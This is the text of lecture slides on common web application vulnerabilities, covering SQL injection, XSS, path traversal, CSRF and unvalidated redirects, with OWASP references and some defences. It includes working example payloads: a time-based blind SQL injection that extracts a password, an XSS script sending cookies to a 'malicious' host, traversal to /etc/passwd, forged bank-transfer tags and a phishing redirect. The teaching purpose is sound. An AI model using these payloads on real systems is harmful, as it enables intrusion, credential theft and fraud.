Most dangerous web application errors

Security of Information Systems

Agenda
1. 2. 3. 4. 5. SQL Injection Cross Site Scripting (XSS) Path Traversal Cross Site Request Forgery (CSRF) Unvalidated Redirect

SQL Injection

SQL Injection
http://example.com/items.php?id=2 SELECT title, description, body FROM items WHERE ID = 2

SQL Injection
http://example.com/items.php?id=2 or 1=2 SELECT title, description, body FROM items WHERE ID = 2 or 1=2

SQL Injection (Blind)

IF(expression, true, false) UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50), --expression BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')), --true null) --false FROM users WHERE user_id = 1;

SQL Injection (Blind)

http://example.com/items.php?id=1 UNION SELECT IF(SUBSTRING (user_password,1,1) = CHAR(50), BENCHMARK(5000000,ENCODE ('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1; If the database response took a long time, we may expect that the first user password character with user_id = 1 is character '2'.

SQL Injection
Defense
Prepared Statements (Parameterized Queries)
String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement stmt = connection.prepareStatement( query ); stmt.setString( 1, name);

Stored Procedures

CallableStatement cs = connection.prepareCall("{call accountBalance(?)}"); cs.setString(1, custname);

Escaping all user supplied input

Cross Site Scripting

Cross Site Scripting

http://example.com/img?src=url <img src="url">

Cross Site Scripting

http://example.com/img?src=dont.exists" onerror="alert(1) <img src="dont.exists" onerror="alert(1)">

Cross Site Scripting

http://example.com/filename <? php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?> Not found: filename

Cross Site Scripting

http://example.com/<script type=text/javascript>i=new Image();i.src='http://malicious/'+document.cookie</script> Not found: <script type=text/javascript> i=new Image(); i.src='http://malicious/'+document.cookie </script>

Path Traversal

Path Traversal
http://example.com/get.php?file=report.pdf

Path Traversal
http://example.com/get.php?file=report.pdf http://example.com/get.php?file=get.php

Path Traversal
http://example.com/get.php?file=report.pdf http://example.com/get.php?file=get.php http://example.com/get.php?file=../get.php

Path Traversal
http://example.com/get.php?file=report.pdf http://example.com/get.php?file=get.php http://example.com/get.php?file=../get.php http://example.com/get.php?file=/etc/passwd

Path Traversal
<?php $template = 'blue.php'; if ( is_set( $_COOKIE['TEMPLATE'] ) ) $template = $_COOKIE['TEMPLATE']; include ( "/home/users/php/templates/" . $template ); ?>

Path Traversal
Request GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Path Traversal
Request GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd Response HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: php:f8fk3j1OIf31.:182:100:Developer:/home/users/php/:/bin/csh

Cross Site Request Forgery

Cross Site Request Forgery

Alice sends $100 to Bob

Cross Site Request Forgery

Alice sends $100 to Bob
POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19; account= BOB&amount= 100

Cross Site Request Forgery

Alice sends $100 to Bob
GET http://bank.com/transfer.do?acct= BOB&amount= 100 HTTP/1.1

Cross Site Request Forgery

What if?

Cross Site Request Forgery

What if?
GET http://bank.com/transfer.do?acct= MARIA&amount= 100000 HTTP/1.1

Cross Site Request Forgery

What if Alice gets an email from Maria?

Cross Site Request Forgery

What if Alice gets an email from Maria?
Hello Alice! View my pictures!

Cross Site Request Forgery

What if Alice gets an email from Maria?
Hello Alice! <a href=http://bank.com/transfer.do?acct= MARIA&amount= 100000> View my pictures! </a>

Cross Site Request Forgery

What if Alice opens malicious website?

Cross Site Request Forgery

What if Alice opens malicious website?
<img src="http://bank.com/transfer.do?acct= MARIA&amount= 100000" width="1" height="1" border="0">

Unvalidated Redirect

Unvalidated Redirect

Unvalidated Redirect
$redirect_url = $_GET['redir']; header("Location: " . $redirect_url);

Unvalidated Redirect
Email to Alice: Greetings from your Bank! Internet Banking Log In

Unvalidated Redirect
Email to Alice: Greetings from your Bank! <a href=https://www.53.com/? a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir= www.evilbank.com&param=F1czz0Kz00lL_5g> Internet Banking Log In </a>

Unvalidated Redirect
Email to Alice: Greetings from your Bank! <a href=https://www.53.com/? a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir= www.evilbank.com&param=F1czz0Kz00lL_5g> Internet Banking Log In </a>

Unvalidated Redirect

Unvalidated Redirect

Thank you

https://www.owasp.org/index.php/Blind_SQL_Injection https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Path_Traversal https://www.owasp.org/index.php/CSRF https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet https://www.53.com/site/global/ib-login.html